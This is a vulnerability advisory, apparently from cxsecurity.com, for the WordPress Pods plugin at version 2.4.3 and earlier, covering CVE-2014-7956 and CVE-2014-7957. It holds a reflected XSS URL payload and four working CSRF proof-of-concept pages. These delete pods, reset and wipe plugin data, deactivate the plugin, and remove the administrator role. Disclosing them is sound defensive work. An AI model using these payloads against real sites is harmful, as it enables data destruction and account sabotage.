WordPress Pods 2.4.3 CSRF / Cross Site Scripting

2015.01.13
Credit: Pietro Oliva
Risk: Medium
Local: No
Remote: Yes

Vulnerability title: Wordpress plugin Pods <= 2.4.3 XSS and CSRF vulnerabilities vulnerabilities Author: Pietro Oliva CVE: CVE-2014-7956, CVE-2014-7957 Product: pods Affected version: pods <= 2.4.3 Vulnerabilities fixed in version: 2.5 XSS vulnerability (CVE-2014-7956, authentication is needed): http://localhost/wp-admin/admin.php?page=pods&action=edit&id=4"></a><script>alert('xss')</script><!-- Multiple CSRF (CVE-2014-7957,authentication needed): CSRF 1 (bruteforce pods IDs and delete them): <html> <body> <script> target="http://localhost"; for (i=0; i<50;i++) document.write('<img style="display:none" src="'+target+'/wp-admin/admin.php?page=pods&action=delete&id='+i+'">'); </script> </body> </html> CSRF 2 (delete pods plugin data): <html> <body onload="document.forms[0].submit();"> <form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&tab=reset"> <input type="hidden" name="pods_reset" value="Reset Pods settings and data "> </form> </html> CSRF 3 (deactivate pods and delete data): <html> <body onload="document.forms[0].submit();"> <form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&tab=reset&pods_reset_deactivate= Deactivate and Delete Pods data "> <input type="hidden" name="pods_reset_deactivate" value=" Deactivate and Delete Pods data "> </form> </html> CSRF 4 (enable "roles and capabilities" component and delete admin role): <html> <script> function continueExecution(){ document.write('<link rel="stylesheet" href="http://localhost/wordpress/wp-admin/admin.php?page=pods-component-roles-and-capabilities&action=delete&id=administrator">'); } document.write('<link rel="stylesheet" href="http://localhost/wordpress/wp-admin/admin.php?page=pods-components&action=toggle&id=roles-and-capabilities&toggle=1&toggled=1">'); setTimeout(continueExecution, 10000); </script> </html> CSRF 4 XSS impact: http://localhost/wp-admin/admin.php?page=pods-components&action=toggle&id=roles-and-capabilities&toggle=1&toggled=111111111" onmouseenter="alert('xss')" style="width:3000px;height:1000px;left:0px;top:0px;position:absolute;opacity:0;"></a><!--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top